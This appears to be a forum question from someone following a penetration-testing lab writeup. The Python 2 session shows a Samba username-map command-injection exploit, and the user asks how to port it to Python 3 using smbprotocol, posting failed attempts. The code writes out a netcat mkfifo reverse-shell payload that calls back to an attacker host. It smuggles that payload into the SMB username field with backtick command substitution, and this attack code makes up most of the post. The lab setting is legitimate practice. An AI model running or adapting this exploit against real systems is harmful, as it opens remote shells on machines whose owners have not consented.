I'm following a pentest writeup which uses Python 2 to connect to an smb share:
Python 2.7.17 (default, Oct 19 2019, 23:36:22)
[GCC 9.2.1 20191008] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from smb.SMBConnection import SMBConnection
>>> payload = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.X 9999 >/tmp/f'
>>> username = "/=`nohup " + payload + "`"
>>> connection = SMBConnection(username, "", "", "")
>>> connection.connect("10.10.10.3",445)
I'm trying to accomplish the same thing using Python 3, this is how far I've gotten:
Python 3.9.2 (default, Feb 28 2021, 17:03:44)
[GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from smbprotocol.connection import Connection
>>> payload = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.X 9999 >/tmp/f'
>>> username = "/=`nohup " + payload + "`"
>>> connection = Connection(username, "", "", "")
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/home/user/.local/lib/python3.9/site-packages/smbprotocol/connection.py", line 638, in __init__
log.info("Initialising connection, guid: %s, require_signing: %s, "
TypeError: %d format: a number is required, not str
>>> import smbclient
>>> smbclient.ClientConfig(username)
<smbclient._pool.ClientConfig object at 0x7f6d093ac2e0>
>>> connection = smbclient.ClientConfig(username)
>>> connection.connect("10.X.X.X",445)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
AttributeError: 'ClientConfig' object has no attribute 'connect'
>>>
The module I am using is https://github.com/jborean93/smbprotocol
